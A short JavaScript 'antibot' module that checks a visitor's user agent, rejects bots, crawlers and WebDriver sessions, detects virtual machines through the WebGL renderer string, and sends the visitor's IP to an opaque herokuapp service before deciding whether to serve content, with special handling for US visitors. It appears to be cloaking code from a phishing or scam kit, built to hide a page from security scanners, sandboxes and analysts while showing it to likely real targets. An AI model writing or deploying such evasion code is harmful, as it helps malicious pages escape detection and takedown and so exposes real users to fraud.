import detect from "detect.js"

const ua = detect.parse(navigator.userAgent)

export const opSupport = () => {
    const browser = ua.os.family
    const type = ["Windows 10", "Mac OS X", "Intel Mac OS X", "iPhone", "Windows Phone", "Windows Mobile", "iOS", "Android", "Samsung"]
    const index = type.indexOf(browser)
    if (index in type) {
        return true
    } else {
        return false
    }

}

export const deviceSupport = () => {
    const device = ua.device.type
    const type = ["Mobile", "Desktop", "Tablet", "iPad"]
    const index = type.indexOf(device)
    if (index in type) {
        return true
    } else {
        return false
    }
}

export const browserSupport = () => {
    const browser = ua.browser.family
    const type = ["Firefox", "Chrome", "Edge", "Opera", "Safari", "Mobile Safari", "Opera Mobile", "Opera Tablet", "Firefox Mobile", "Chrome Mobile", "Chrome Mobile iOS"]
    const index = type.indexOf(browser)
    if (index in type) {
        return true
    } else {
        return false
    }
}

export const checkBot = () => {
    const source = ua.source
    const bot = source.toLowerCase().indexOf("bot")
    const crawl = source.toLowerCase().indexOf("crawl")
    const isDriver = navigator.webdriver
    if (bot != -1 || crawl != -1 || isDriver == true) {
        return false
    } else {
        return true
    }

}

export const checkVBox = () => {


    const canvas = document.createElement('canvas')
    const gl = canvas.getContext('webgl')
    const debugInfo = gl.getExtension('WEBGL_debug_renderer_info')
    const vendor = gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL)
    const renderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL)
    if (renderer.indexOf("VMware") != -1 || renderer.indexOf("Virtual") != -1) {
        return false
    }
    else {
        return true
    }
}

export const getAntibot = async () => {

    const response = await fetch("https://geolocation-db.com/json/2c7ba9a0-fcc9-11eb-80e0-2d180bc7db04")
    const data = await response.json()
    const ipquality = await fetch(`https://enigmatic-castle-98457.herokuapp.com/zMzKIQJBM8HjNqz5WxEurfvvlWSHXYp3/${data.IPv4}`)
    const ipdata = await ipquality.json()
    if (ipdata.status == "False") {
        return false
    }
    else if (ipdata.status == "True") {
        return true
    } else if (ipdata.status == "Success is false" || ipdata.status == ""){
        return data.country_code
    }


}

export default async function antibotSupport() {
    const op = opSupport()
    const vbox = checkVBox()
    const browser = browserSupport()
    const device = deviceSupport()
    const bot = checkBot()
    const antiBot = await getAntibot()
 
    if (op === true && browser === true && device === true && bot === true && antiBot === true || antiBot == "US" && vbox === true || vbox === "error") {
        return true
    } else {
        return false
    }

}